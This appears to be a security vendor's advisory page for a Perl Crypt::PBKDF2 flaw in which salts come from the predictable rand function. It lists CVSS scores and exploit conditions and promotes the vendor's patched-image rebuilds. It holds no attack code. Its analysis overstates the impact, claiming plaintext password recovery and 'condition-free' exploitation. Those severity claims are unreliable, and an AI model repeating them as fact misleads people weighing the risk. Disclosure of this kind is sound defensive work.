CVE-2026-9638: Crypt::PBKDF2 versions before 0.261630 for Perl generate insecure random values for salts
Crypt::PBKDF2 versions before 0.261630 for Perl generate insecure random values for salts. These versions use the built-in rand function, which is predictable and unsuitable for cryptography.
Metrics
- CVSS v3.1
- 7.5
- Severity
- HIGH
- Fixed in
- 0.261630
- Affected Products
- 1
HarborGuard Analysis
Synopsis
An insecure random number generation vulnerability affects Crypt::PBKDF2 for Perl in versions before 0.261630. The library uses Perl's built-in rand function to generate password-hashing salts, which is predictable and not suitable for cryptographic use. Exploiting this weakness over the network requires no authentication and allows an attacker to recover plaintext passwords from hashed values. A patched-image rebuild at version 0.261630 is available on HarborGuard for environments running an affected version.
HarborGuard Coverage
Detection of CVE-2026-9638 is available across every HarborGuard environment. Vulnerability data is ingested from upstream feeds within minutes of publication and matched against customer registry images and CI/CD pipeline images, including custom-built images that bundle Crypt::PBKDF2.
AvailableHarborGuard is capable of scoring this CVE at CVSS 7.5 (HIGH) and weighting it against each environment's compliance policy to determine urgency. Triage findings are routable to the appropriate team inbox within each customer organization based on policy configuration.
AvailableA patched-image rebuild at Crypt::PBKDF2 version 0.261630 becomes available on HarborGuard for any image found to carry an affected version. For customers who opt into auto-remediation, HarborGuard performs the rebuild, runs regression tests, and opens a pull request against affected workloads.
AvailableExploit Conditions
- Network reachabilityRequired
The attacker must be able to reach the service over the network; any internet-exposed or internally networked service using this library is in scope.
- AuthenticationNot required
No account or credential is needed to exploit the weakness; the attack targets the predictability of salts produced by the library, not a protected endpoint.
- Victim interactionNot required
No user action is required; exploitation is passive and relies entirely on the attacker's ability to observe or obtain hashed password values.
- Attack complexityDetail
The exploit is reliable and condition-free once hashed values are obtained, as salt predictability from rand is a deterministic property of the library with no environmental dependencies.
Blast Radius
- An attacker who obtains hashed password values can reconstruct the salts used during hashing and accelerate brute-force or dictionary attacks to recover plaintext passwords.
- Recovered plaintext passwords expose user credentials stored or processed by any application relying on Crypt::PBKDF2 for password hashing.
- Confidentiality of all password material protected by this library is fully compromised; integrity and availability of the host system are not directly affected by this vulnerability.
How HarborGuard Handles This
Available on HarborGuard: detection of this CVE is matched against images in customer registries and pipelines within minutes of publication, covering both upstream base images and custom images that bundle Crypt::PBKDF2. Where a fix version is identified (0.261630), a patched-image rebuild becomes available immediately. For customers who opt into auto-remediation, HarborGuard performs the rebuild, runs a regression test suite, and opens a pull request against affected workloads. The median time from CVE publication to merged patch PR for high-severity issues is around 90 minutes for environments with auto-remediation enabled. Where compliance policy permits, this flow runs automatically; otherwise, the rebuilt image and PR are staged for manual approval.
Fix available
- ARODLAND / Crypt::PBKDF2< 0.261630 (from 0)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N